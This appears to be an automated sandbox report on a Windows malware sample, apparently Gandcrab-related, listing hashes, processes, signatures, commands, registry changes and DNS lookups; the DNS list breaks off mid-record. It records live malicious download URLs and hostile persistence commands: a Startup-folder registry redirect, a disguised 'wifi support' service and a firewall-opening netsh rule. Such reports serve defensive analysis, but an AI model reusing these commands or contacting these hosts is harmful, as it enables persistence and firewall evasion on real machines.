Timestamp: Jun 19, 2019, 06:34 PM
1
2[*] MalFamily: "Malicious"
3
4[*] MalScore: 10.0
5
6[*] File Name: "Exes_b492132bdd954cc96d1a52c8f33466eb.exe"
7[*] File Size: 294632
8[*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9[*] SHA256: "55466706e69ae98b0480c6fded9a5c6ce1a7d0cd2f647c78c37b6bda9a71d3bf"
10[*] MD5: "b492132bdd954cc96d1a52c8f33466eb"
11[*] SHA1: "5d38c870cbbc7bf8e5d29d07fb77258c0db42bf3"
12[*] SHA512: "84a832d43357dd1e194f53cfedbcbf5e9dfb2f535a19c669540dd83458bac12e3126265fe8f4577a9fe901928f2945ae78de994813b88a3d31e56df5d47331d3"
13[*] CRC32: "B25D7831"
14[*] SSDEEP: "6144:GSM7aCPqsTeFAH3jjKeG28SnIkU1HpvN3:G9PqsT3XjjKeGvSIr1Hn3"
15
16[*] Process Execution: [
17 "Exes_b492132bdd954cc96d1a52c8f33466eb.exe",
18 "hkmoov.exe",
19 "reg.exe",
20 "4d7b8586.exe",
21 "2.exe",
22 "cmd.exe",
23 "cmd.exe",
24 "sc.exe",
25 "sc.exe",
26 "sc.exe",
27 "netsh.exe",
28 "9e022403.exe",
29 "services.exe",
30 "svchost.exe",
31 "mlxtyisf.exe"
32]
33
34[*] Signatures Detected: [
35 {
36 "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
37 "Details": [
38 {
39 "IP": "185.81.129.33:80"
40 },
41 {
42 "IP": "80.85.155.70:80"
43 }
44 ]
45 },
46 {
47 "Description": "Creates RWX memory",
48 "Details": []
49 },
50 {
51 "Description": "Reads data out of its own binary image",
52 "Details": [
53 {
54 "self_read": "process: Exes_b492132bdd954cc96d1a52c8f33466eb.exe, pid: 1392, offset: 0x00000000, length: 0x00033000"
55 },
56 {
57 "self_read": "process: 2.exe, pid: 2856, offset: 0x00000000, length: 0x00000040"
58 },
59 {
60 "self_read": "process: 2.exe, pid: 2856, offset: 0x00000000, length: 0x00018800"
61 },
62 {
63 "self_read": "process: 2.exe, pid: 2856, offset: 0x00000080, length: 0x000001c0"
64 }
65 ]
66 },
67 {
68 "Description": "A process created a hidden window",
69 "Details": [
70 {
71 "Process": "2.exe -> cmd"
72 },
73 {
74 "Process": "2.exe -> cmd"
75 },
76 {
77 "Process": "2.exe -> sc"
78 },
79 {
80 "Process": "2.exe -> sc"
81 },
82 {
83 "Process": "2.exe -> sc"
84 },
85 {
86 "Process": "2.exe -> netsh"
87 }
88 ]
89 },
90 {
91 "Description": "Drops a binary and executes it",
92 "Details": [
93 {
94 "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\4d7b8586.exe"
95 },
96 {
97 "binary": "C:\\programdata\\cf4620d67a\\hkmoov.exe"
98 },
99 {
100 "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2.exe"
101 },
102 {
103 "binary": "C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe"
104 },
105 {
106 "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\9e022403.exe"
107 },
108 {
109 "binary": "C:\\Users\\user\\AppData\\Roaming\\Intel Rapid\\IntelRapid.exe"
110 }
111 ]
112 },
113 {
114 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
115 "Details": [
116 {
117 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
118 },
119 {
120 "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
121 },
122 {
123 "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
124 },
125 {
126 "suspicious_request": "http://vt-ne.com/upload/index.php"
127 },
128 {
129 "suspicious_request": "http://a-7763.com/uploads/4d7b8586.exe"
130 },
131 {
132 "suspicious_request": "http://80.85.155.70/2.php"
133 },
134 {
135 "suspicious_request": "http://a-7763.com/uploads/9e022403.exe"
136 },
137 {
138 "suspicious_request": "http://www.msftncsi.com/ncsi.txt"
139 },
140 {
141 "suspicious_request": "http://www.google.com/"
142 },
143 {
144 "suspicious_request": "http://www.trackip.net/ip"
145 },
146 {
147 "suspicious_request": "http://api.ipify.org/"
148 }
149 ]
150 },
151 {
152 "Description": "Performs some HTTP requests",
153 "Details": [
154 {
155 "url": "http://vt-ne.com/upload/index.php"
156 },
157 {
158 "url": "http://a-7763.com/uploads/4d7b8586.exe"
159 },
160 {
161 "url": "http://80.85.155.70/2.php"
162 },
163 {
164 "url": "http://a-7763.com/uploads/9e022403.exe"
165 },
166 {
167 "url": "http://www.msftncsi.com/ncsi.txt"
168 },
169 {
170 "url": "http://www.google.com/"
171 },
172 {
173 "url": "http://www.trackip.net/ip"
174 },
175 {
176 "url": "http://api.ipify.org/"
177 }
178 ]
179 },
180 {
181 "Description": "Queries information on disks, possibly for anti-virtualization",
182 "Details": []
183 },
184 {
185 "Description": "Attempts to restart the guest VM",
186 "Details": []
187 },
188 {
189 "Description": "Enumerates services, possibly for anti-virtualization",
190 "Details": []
191 },
192 {
193 "Description": "Executed a process and injected code into it, probably while unpacking",
194 "Details": [
195 {
196 "Injection": "mlxtyisf.exe(2656) -> None(1028)"
197 }
198 ]
199 },
200 {
201 "Description": "Installs itself for autorun at Windows startup",
202 "Details": [
203 {
204 "service name": "gzsiyoiy"
205 },
206 {
207 "service path": "C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe /d\"C:\\Users\\user\\AppData\\Local\\Temp\\2.exe\""
208 }
209 ]
210 },
211 {
212 "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
213 "Details": [
214 {
215 "modified_name": "explorer.exe",
216 "modified_path": "C:\\Windows\\explorer.exe",
217 "original_name": "4d7b8586.exe",
218 "original_path": "C:\\Users\\user\\AppData\\Local\\Temp\\4d7b8586.exe"
219 }
220 ]
221 },
222 {
223 "Description": "Attempts to identify installed AV products by installation directory",
224 "Details": [
225 {
226 "file": "C:\\ProgramData\\AVAST Software"
227 },
228 {
229 "file": "C:\\ProgramData\\Avira"
230 },
231 {
232 "file": "C:\\ProgramData\\Kaspersky Lab"
233 },
234 {
235 "file": "C:\\ProgramData\\ESET"
236 },
237 {
238 "file": "C:\\ProgramData\\Panda Security"
239 },
240 {
241 "file": "C:\\ProgramData\\Bitdefender"
242 },
243 {
244 "file": "C:\\ProgramData\\AVG"
245 },
246 {
247 "file": "C:\\ProgramData\\Doctor Web"
248 }
249 ]
250 },
251 {
252 "Description": "File has been identified by 16 Antiviruses on VirusTotal as malicious",
253 "Details": [
254 {
255 "FireEye": "Generic.mg.b492132bdd954cc9"
256 },
257 {
258 "McAfee": "Trojan-FQZA!B492132BDD95"
259 },
260 {
261 "Symantec": "ML.Attribute.HighConfidence"
262 },
263 {
264 "APEX": "Malicious"
265 },
266 {
267 "ClamAV": "Win.Malware.Generickdz-6907156-0"
268 },
269 {
270 "Kaspersky": "UDS:DangerousObject.Multi.Generic"
271 },
272 {
273 "Trapmine": "malicious.moderate.ml.score"
274 },
275 {
276 "SentinelOne": "DFI - Suspicious PE"
277 },
278 {
279 "Microsoft": "Trojan:Win32/Gandcrab.AF"
280 },
281 {
282 "Endgame": "malicious (high confidence)"
283 },
284 {
285 "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
286 },
287 {
288 "Acronis": "suspicious"
289 },
290 {
291 "Cylance": "Unsafe"
292 },
293 {
294 "Rising": "Malware.Heuristic.MLite(80%) (AI-LITE:65KWFtAVKhavWd/CpO8uFg)"
295 },
296 {
297 "CrowdStrike": "win/malicious_confidence_60% (D)"
298 },
299 {
300 "Qihoo-360": "HEUR/QVM10.1.F8B7.Malware.Gen"
301 }
302 ]
303 },
304 {
305 "Description": "Creates a copy of itself",
306 "Details": [
307 {
308 "copy": "C:\\programdata\\cf4620d67a\\hkmoov.exe"
309 }
310 ]
311 }
312]
313
314[*] Started Service: [
315 "gzsiyoiy"
316]
317
318[*] Executed Commands: [
319 "c:\\programdata\\cf4620d67a\\hkmoov.exe",
320 "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\cf4620d67a",
321 "C:\\Users\\user\\AppData\\Local\\Temp\\4d7b8586.exe",
322 "C:\\Users\\user\\AppData\\Local\\Temp\\2.exe",
323 "C:\\Users\\user\\AppData\\Local\\Temp\\9e022403.exe",
324 "\"C:\\Windows\\System32\\cmd.exe\" /C mkdir C:\\Windows\\SysWOW64\\gzsiyoiy\\",
325 "cmd /C mkdir C:\\Windows\\SysWOW64\\gzsiyoiy\\",
326 "\"C:\\Windows\\System32\\cmd.exe\" /C move /Y \"C:\\Users\\user\\AppData\\Local\\Temp\\mlxtyisf.exe\" C:\\Windows\\SysWOW64\\gzsiyoiy\\",
327 "cmd /C move /Y \"C:\\Users\\user\\AppData\\Local\\Temp\\mlxtyisf.exe\" C:\\Windows\\SysWOW64\\gzsiyoiy\\",
328 "\"C:\\Windows\\System32\\sc.exe\" create gzsiyoiy binPath= \"C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe /d\\\"C:\\Users\\user\\AppData\\Local\\Temp\\2.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"",
329 "sc create gzsiyoiy binPath= \"C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe /d\\\"C:\\Users\\user\\AppData\\Local\\Temp\\2.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"",
330 "\"C:\\Windows\\System32\\sc.exe\" description gzsiyoiy \"wifi internet conection\"",
331 "sc description gzsiyoiy \"wifi internet conection\"",
332 "\"C:\\Windows\\System32\\sc.exe\" start gzsiyoiy",
333 "sc start gzsiyoiy",
334 "\"C:\\Windows\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"C:\\Windows\\SysWOW64\\svchost.exe\" enable=yes>nul",
335 "netsh advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"C:\\Windows\\SysWOW64\\svchost.exe\" enable=yes>nul",
336 "C:\\Users\\user\\AppData\\Roaming\\Intel Rapid\\IntelRapid.exe",
337 "C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe /d\"C:\\Users\\user\\AppData\\Local\\Temp\\2.exe\"",
338 "svchost.exe"
339]
340
341[*] Mutexes: [
342 "HbyzzAwhcXhduw",
343 "Local\\ZoneAttributeCacheCounterMutex",
344 "Local\\ZonesCacheCounterMutex",
345 "Local\\ZonesLockedCacheCounterMutex"
346]
347
348[*] Modified Files: [
349 "C:\\ProgramData\\0",
350 "C:\\programdata\\cf4620d67a\\hkmoov.exe",
351 "C:\\programdata\\cf4620d67a\\hkmoov.exe:Zone.Identifier",
352 "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Q8H2MS75\\4d7b8586[1].exe",
353 "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\8BGZLQBV\\calc[1].exe",
354 "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\9e022403[1].exe",
355 "\\??\\PHYSICALDRIVE0",
356 "\\??\\pipe\\ngzpfvpf",
357 "C:\\Users\\user\\AppData\\Local\\Temp\\mlxtyisf.exe",
358 "C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe",
359 "C:\\Users\\user\\AppData\\Roaming\\Intel Rapid\\IntelRapid.exe",
360 "\\??\\PIPE\\srvsvc",
361 "C:\\ProgramData\\cf4620d67a\\IntelRapid.lnk",
362 "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
363 "C:\\Windows\\sysnative\\Tasks\\Intel Rapid"
364]
365
366[*] Deleted Files: [
367 "C:\\Users\\user\\AppData\\Local\\Temp\\mlxtyisf.exe",
368 "C:\\Windows\\Tasks\\Intel Rapid.job"
369]
370
371[*] Modified Registry Keys: [
372 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup",
373 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
374 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
375 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{D49F2109-98AC-46C0-8C98-1DF3806E924A}\\Path",
376 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{D49F2109-98AC-46C0-8C98-1DF3806E924A}\\Hash",
377 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Intel Rapid\\Id",
378 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Intel Rapid\\Index",
379 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{D49F2109-98AC-46C0-8C98-1DF3806E924A}\\Triggers",
380 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{D49F2109-98AC-46C0-8C98-1DF3806E924A}\\DynamicInfo"
381]
382
383[*] Deleted Registry Keys: [
384 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
385 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
386 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
387 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
388 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Intel Rapid.job",
389 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Intel Rapid.job.fp"
390]
391
392[*] DNS Communications: [
393 {
394 "type": "A",
395 "request": "vt-ne.com",
396 "answers": [
397 {
398 "data": "47.254.157.47",
399 "type": "A"
400 }
401 ]
402 },
403 {
404 "type": "A",
405 "request": "a-7763.com",
406 "answers": [
407 {
408 "data": "185.81.129.33",
409 "type": "A"
410 }
411 ]
412 },
413 {
414 "type": "PTR",
415 "request": "13.67.98.172.in-addr.arpa",
416 "answers": []
417 },
418 {
419 "type": "MX",
420 "request": "apasesores.com",
421 "answers": []
422 },
423 {
424 "type": "MX",
425 "request": "y7mail.com",
426 "answers": [
427 {
428 "data": "mta5.am0.yahoodns.net",
429 "type": "MX"
430 },
431 {
432 "data": "mta7.am0.yahoodns.net",
433 "type": "MX"
434 },
435 {
436 "data": "mta6.am0.yahoodns.net",
437 "type": "MX"
438 }
439 ]
440 },
441 {
442 "type": "A",
443 "request": "mta5.am0.yahoodns.net",
444 "answers": [
445 {
446 "data": "67.195.228.94",
447 "type": "A"
448 },
449 {
450 "data": "74.6.137.64",
451 "type": "A"
452 },
453 {
454 "data": "74.6.137.65",
455 "type": "A"
456 },
457 {
458 "data": "98.137.159.27",
459 "type": "A"
460 },
461 {
462 "data": "98.137.159.26",
463 "type": "A"
464 },
465 {
466 "data": "98.137.159.24",
467 "type": "A"
468 },
469 {
470 "data": "74.6.137.63",
471 "type": "A"
472 },
473 {
474 "data": "67.195.228.110",
475 "type": "A"
476 }
477 ]
478 },
479 {
480 "type": "MX",
481 "request": "aol.com",
482 "answers": [
483 {
484 "data": "mx-aol.mail.gm0.yahoodns.net",
485 "type": "MX"
486 }
487 ]
488 },
489 {
490 "type": "A",
491 "request": "mx-aol.mail.gm0.yahoodns.net",
492 "answers": [
493 {
494 "data": "67.195.228.87",
495 "type": "A"
496 },
497 {
498 "data": "98.137.157.43",
499 "type": "A"
500 },
501 {
502 "data": "98.136.101.116",
503 "type": "A"
504 },
505 {
506 "data": "98.136.96.73",
507 "type": "A"
508 },
509 {
510 "data": "66.218.85.151",
511 "type": "A"
512 },
513 {
514 "data": "74.6.141.40",
515 "type": "A"
516 }
517 ]
518 },
519 {
520 "type": "MX",
521 "request": "cableone.net",
522 "answers": [
523 {
524 "data": "mx.cableone.net",
525 "type": "MX"
526 }
527 ]
528 },
529 {
530 "type": "A",
531 "request": "mx.cableone.net",
532 "answers": [
533 {
534 "data": "69.168.106.65",
535 "type": "A"
536 }
537 ]
538 },
539 {
540 "type": "MX",
541 "request": "besuttisenin.it",
542 "answers": [
543 {
544 "data": "",
545 "type": "NXDOMAIN"
546 }
547 ]
548 },
549 {
550 "type": "MX",
551 "request": "wailic.com",
552 "answers": [
553 {
554 "data": "alt2.aspmx.l.google.com",
555 "type": "MX"
556 },
557 {
558 "data": "alt1.aspmx.l.google.com",
559 "type": "MX"
560 },
561 {
562 "data": "aspmx4.googlemail.com",
563 "type": "MX"
564 },
565 {
566 "data": "aspmx3.googlemail.com",
567 "type": "MX"
568 },
569 {
570 "data": "aspmx5.googlemail.com",
571 "type": "MX"
572 },
573 {
574 "data": "aspmx.l.google.com",
575 "type": "MX"
576 },
577 {
578 "data": "aspmx2.googlemail.com",
579 "type": "MX"
580 }
581 ]
582 },
583 {
584 "type": "MX",
585 "request": "tiscalinet.it",
586 "answers": [
587 {
588 "data": "etb-1.mail.tiscali.it",
589 "type": "MX"
590 },
591 {
592 "data": "imp-5.mail.tiscali.it",
593 "type": "MX"
594 },
595 {
596 "data": "etb-3.mail.tiscali.it",
597 "type": "MX"
598 },
599 {
600 "data": "etb-2.mail.tiscali.it",
601 "type": "MX"
602 },
603 {
604 "data": "etb-4.mail.tiscali.it",
605 "type": "MX"
606 }
607 ]
608 },
609 {
610 "type": "A",
611 "request": "etb-4.mail.tiscali.it",
612 "answers": [
613 {
614 "data": "213.205.33.63",
615 "type": "A"
616 },
617 {
618 "data": "213.205.33.64",
619 "type": "A"
620 },
621 {
622 "data": "213.205.33.61",
623 "type": "A"
624 },
625 {
626 "data": "213.205.33.62",
627 "type": "A"
628 }
629 ]
630 },
631 {
632 "type": "MX",
633 "request": "cs.com",
634 "answers": [
635 {
636 "data": "mx-aol.mail.gm0.yahoodns.net",
637 "type": "MX"
638 }
639 ]
640 },
641 {
642 "type": "MX",
643 "request": "crosslake.net",
644 "answers": [
645 {
646 "data": "filter.crosslake.net",
647 "type": "MX"
648 }
649 ]
650 },
651 {
652 "type": "A",
653 "request": "filter.crosslake.net",
654 "answers": [
655 {
656 "data": "74.51.186.34",
657 "type": "A"
658 }
659 ]
660 },
661 {
662 "type": "MX",
663 "request": "comcast.net",
664 "answers": [
665 {
666 "data": "mx2.comcast.net",
667 "type": "MX"
668 },
669 {
670 "data": "mx1.comcast.net",
671 "type": "MX"
672 }
673 ]
674 },
675 {
676 "type": "A",
677 "request": "mx2.comcast.net",
678 "answers": [
679 {
680 "data": "68.87.20.5",
681 "type": "A"
682 }
683 ]
684 },
685 {
686 "type": "MX",
687 "request": "argoss.org",
688 "answers": [
689 {
690 "data": "",
691 "type": "NXDOMAIN"
692 }
693 ]
694 },
695 {
696 "type": "MX",
697 "request": "tiscali.co.uk",
698 "answers": [
699 {
700 "data": "mx.tiscali.co.uk",
701 "type": "MX"
702 }
703 ]
704 },
705 {
706 "type": "A",
707 "request": "mx.tiscali.co.uk",
708 "answers": [
709 {
710 "data": "62.24.139.42",
711 "type": "A"
712 }
713 ]
714 },
715 {
716 "type": "MX",
717 "request": "global-forwarding.co.uk",
718 "answers": [
719 {
720 "data": "",
721 "type": "NXDOMAIN"
722 }
723 ]
724 },
725 {
726 "type": "MX",
727 "request": "cemcrete.co.za",
728 "answers": [
729 {
730 "data": "cemcrete-co-za.mail.protection.outlook.com",
731 "type": "MX"
732 }
733 ]
734 },
735 {
736 "type": "A",
737 "request": "cemcrete-co-za.mail.protection.outlook.com",
738 "answers": [
739 {
740 "data": "104.47.5.36",
741 "type": "A"
742 },
743 {
744 "data": "104.47.4.36",
745 "type": "A"
746 }
747 ]
748 },
749 {
750 "type": "MX",
751 "request": "bativert-dz.com",
752 "answers": [
753 {
754 "data": "mail.bativert-dz.com",
755 "type": "MX"
756 }
757 ]
758 },
759 {
760 "type": "A",
761 "request": "mail.bativert-dz.com",
762 "answers": [
763 {
764 "data": "192.254.232.36",
765 "type": "A"
766 }
767 ]
768 },
769 {
770 "type": "A",
771 "request": "www.netflix.com",
772 "answers": [
773 {
774 "data": "34.238.74.93",
775 "type": "A"
776 },
777 {
778 "data": "www.us-east-1.prodaa.netflix.com",
779 "type": "CNAME"
780 },
781 {
782 "data": "52.20.168.249",
783 "type": "A"
784 },
785 {
786 "data": "34.194.103.209",
787 "type": "A"
788 },
789 {
790 "data": "34.234.59.120",
791 "type": "A"
792 },
793 {
794 "data": "54.173.169.115",
795 "type": "A"
796 },
797 {
798 "data": "34.232.235.235",
799 "type": "A"
800 },
801 {
802 "data": "54.164.254.216",
803 "type": "A"
804 },
805 {
806 "data": "54.165.246.104",
807 "type": "A"
808 },
809 {
810 "data": "www.geo.netflix.com",
811 "type": "CNAME"
812 },
813 {
814 "data": "34.230.208.35",
815 "type": "A"
816 },
817 {
818 "data": "54.164.56.104",
819 "type": "A"
820 },
821 {
822 "data": "52.73.237.45",
823 "type": "A"
824 },
825 {
826 "data": "54.89.22.165",
827 "type": "A"
828 },
829 {
830 "data": "34.236.111.10",
831 "type": "A"
832 },
833 {
834 "data": "52.6.51.102",
835 "type": "A"
836 },
837 {
838 "data": "34.237.9.27",
839 "type": "A"
840 },
841 {
842 "data": "52.207.12.211",
843 "type": "A"
844 }
845 ]
846 },
847 {
848 "type": "MX",
849 "request": "hackney.gov.uk",
850 "answers": [
851 {
852 "data": "alt4.aspmx.l.google.com",
853 "type": "MX"
854 },
855 {
856 "data": "alt3.aspmx.l.google.com",
857 "type": "MX"
858 },
859 {
860 "data": "alt2.aspmx.l.google.com",
861 "type": "MX"
862 },
863 {
864 "data": "alt1.aspmx.l.google.com",
865 "type": "MX"
866 },
867 {
868 "data": "aspmx.l.google.com",
869 "type": "MX"
870 }
871 ]
872 },
873 {
874 "type": "MX",
875 "request": "centraloregonlimos.com",
876 "answers": [
877 {
878 "data": "centraloregonlimos.com",
879 "type": "MX"
880 }
881 ]
882 },
883 {
884 "type": "A",
885 "request": "centraloregonlimos.com",
886 "answers": [
887 {
888 "data": "142.4.20.117",
889 "type": "A"
890 }
891 ]
892 },
893 {
894 "type": "MX",
895 "request": "epssworks.com",
896 "answers": [
897 {
898 "data": "d120086a.ess.barracudanetworks.com",
899 "type": "MX"
900 },
901 {
902 "data": "d120086b.ess.barracudanetworks.com",
903 "type": "MX"
904 }
905 ]
906 },
907 {
908 "type": "A",
909 "request": "d120086a.ess.barracudanetworks.com",
910 "answers": [
911 {
912 "data": "209.222.82.144",
913 "type": "A"
914 },
915 {
916 "data": "209.222.82.126",
917 "type": "A"
918 },
919 {
920 "data": "209.222.82.138",
921 "type": "A"
922 },
923 {
924 "data": "209.222.82.141",
925 "type": "A"
926 },
927 {
928 "data": "209.222.82.135",
929 "type": "A"
930 },
931 {
932 "data": "209.222.82.156",
933 "type": "A"
934 },
935 {
936 "data": "209.222.82.150",
937 "type": "A"
938 },
939 {
940 "data": "209.222.82.147",
941 "type": "A"
942 },
943 {
944 "data": "209.222.82.162",
945 "type": "A"
946 },
947 {
948 "data": "209.222.82.165",
949 "type": "A"
950 },
951 {
952 "data": "209.222.82.132",
953 "type": "A"
954 },
955 {
956 "data": "209.222.82.153",
957 "type": "A"
958 },
959 {
960 "data": "209.222.82.159",
961 "type": "A"
962 },
963 {
964 "data": "209.222.82.129",
965 "type": "A"
966 }
967 ]
968 },
969 {
970 "type": "MX",
971 "request": "mixmail.com",
972 "answers": [
973 {
974 "data": "ing.wanadoo.es",
975 "type": "MX"
976 }
977 ]
978 },
979 {
980 "type": "A",
981 "request": "ing.wanadoo.es",
982 "answers": [
983 {
984 "data": "62.36.20.73",
985 "type": "A"
986 }
987 ]
988 },
989 {
990 "type": "MX",
991 "request": "einstein.edu",
992 "answers": [
993 {
994 "data": "mxa-00337c01.gslb.pphosted.com",
995 "type": "MX"
996 },
997 {
998 "data": "mxb-00337c01.gslb.pphosted.com",
999 "type": "MX"
1000 }
1001 ]
1002 },
1003 {
1004 "type": "A",
1005 "request": "mxa-00337c01.gslb.pphosted.com",
1006 "answers": [
1007 {
1008 "data": "148.163.145.199",
1009 "type": "A"
1010 }
1011 ]
1012 },
1013 {
1014 "type": "MX",
1015 "request": "ckdgalbraith.co.uk",
1016 "answers": [
1017 {
1018 "data": "cluster8a.eu.messagelabs.com",
1019 "type": "MX"
1020 },
1021 {
1022 "data": "cluster8.eu.messagelabs.com",
1023 "type": "MX"
1024 }
1025 ]
1026 },
1027 {
1028 "type": "A",
1029 "request": "cluster8.eu.messagelabs.com",
1030 "answers": [
1031 {
1032 "data": "85.158.142.104",
1033 "type": "A"
1034 },
1035 {
1036 "data": "85.158.142.194",
1037 "type": "A"
1038 },
1039 {
1040 "data": "46.226.53.50",
1041 "type": "A"
1042 },
1043 {
1044 "data": "46.226.52.200",
1045 "type": "A"
1046 },
1047 {
1048 "data": "46.226.53.56",
1049 "type": "A"
1050 },
1051 {
1052 "data": "85.158.142.201",
1053 "type": "A"
1054 },
1055 {
1056 "data": "85.158.142.98",
1057 "type": "A"
1058 },
1059 {
1060 "data": "46.226.52.104",
1061 "type": "A"
1062 },
1063 {
1064 "data": "46.226.52.98",
1065 "type": "A"
1066 },
1067 {
1068 "data": "46.226.52.194",
1069 "type": "A"
1070 }
1071 ]
1072 },
1073 {
1074 "type": "MX",
1075 "request": "chrzan.com",
1076 "answers": [
1077 {
1078 "data": "chrzan.com",
1079 "type": "MX"
1080 }
1081 ]
1082 },
1083 {
1084 "type": "A",
1085 "request": "chrzan.com",
1086 "answers": [
1087 {
1088 "data": "198.46.81.192",
1089 "type": "A"
1090 }
1091 ]
1092 },
1093 {
1094 "type": "MX",
1095 "request": "caninter.ca",
1096 "answers": [
1097 {
1098 "data": "caninter.ca",
1099 "type": "MX"
1100 }
1101 ]
1102 },
1103 {
1104 "type": "A",
1105 "request": "caninter.ca",
1106 "answers": [
1107 {
1108 "data": "192.185.138.139",
1109 "type": "A"
1110 }
1111 ]
1112 },
1113 {
1114 "type": "MX",
1115 "request": "hotmail.com",
1116 "answers": [
1117 {
1118 "data": "hotmail-com.olc.protection.outlook.com",
1119 "type": "MX"
1120 }
1121 ]
1122 },
1123 {
1124 "type": "A",
1125 "request": "hotmail-com.olc.protection.outlook.com",
1126 "answers": [
1127 {
1128 "data": "104.47.8.33",
1129 "type": "A"
1130 },
1131 {
1132 "data": "104.47.9.33",
1133 "type": "A"
1134 },
1135 {
1136 "data": "104.47.126.33",
1137 "type": "A"
1138 },
1139 {
1140 "data": "104.47.124.33",
1141 "type": "A"
1142 }
1143 ]
1144 },
1145 {
1146 "type": "MX",
1147 "request": "libero.it",
1148 "answers": [
1149 {
1150 "data": "smtp-in.libero.it",
1151 "type": "MX"
1152 }
1153 ]
1154 },
1155 {
1156 "type": "A",
1157 "request": "smtp-in.libero.it",
1158 "answers": [
1159 {
1160 "data": "213.209.1.129",
1161 "type": "A"
1162 }
1163 ]
1164 },
1165 {
1166 "type": "MX",
1167 "request": "go-for-it.fsnet.co.uk",
1168 "answers": [
1169 {
1170 "data": "frontend.winston.odinfra.com",
1171 "type": "CNAME"
1172 },
1173 {
1174 "data": "mar202015-webserve-g17njniegl34-403973296.eu-west-1.elb.amazonaws.com",
1175 "type": "CNAME"
1176 }
1177 ]
1178 },
1179 {
1180 "type": "MX",
1181 "request": "nationwide.co.uk",
1182 "answers": [
1183 {
1184 "data": "cluster3a.eu.messagelabs.com",
1185 "type": "MX"
1186 },
1187 {
1188 "data": "cluster3.eu.messagelabs.com",
1189 "type": "MX"
1190 }
1191 ]
1192 },
1193 {
1194 "type": "A",
1195 "request": "cluster3.eu.messagelabs.com",
1196 "answers": [
1197 {
1198 "data": "85.158.142.198",
1199 "type": "A"
1200 },
1201 {
1202 "data": "85.158.142.102",
1203 "type": "A"
1204 },
1205 {
1206 "data": "46.226.53.51",
1207 "type": "A"
1208 },
1209 {
1210 "data": "46.226.52.198",
1211 "type": "A"
1212 },
1213 {
1214 "data": "85.158.142.99",
1215 "type": "A"
1216 },
1217 {
1218 "data": "46.226.53.54",
1219 "type": "A"
1220 },
1221 {
1222 "data": "46.226.52.102",
1223 "type": "A"
1224 },
1225 {
1226 "data": "46.226.52.99",
1227 "type": "A"
1228 },
1229 {
1230 "data": "46.226.52.195",
1231 "type": "A"
1232 },
1233 {
1234 "data": "85.158.142.192",
1235 "type": "A"
1236 }
1237 ]
1238 },
1239 {
1240 "type": "MX",
1241 "request": "clovelly.org.au",
1242 "answers": [
1243 {
1244 "data": "mail.clovelly.org.au",
1245 "type": "MX"
1246 }
1247 ]
1248 },
1249 {
1250 "type": "A",
1251 "request": "mail.clovelly.org.au",
1252 "answers": [
1253 {
1254 "data": "69.89.31.205",
1255 "type": "A"
1256 }
1257 ]
1258 },
1259 {
1260 "type": "MX",
1261 "request": "tmmaestro.com",
1262 "answers": [
1263 {
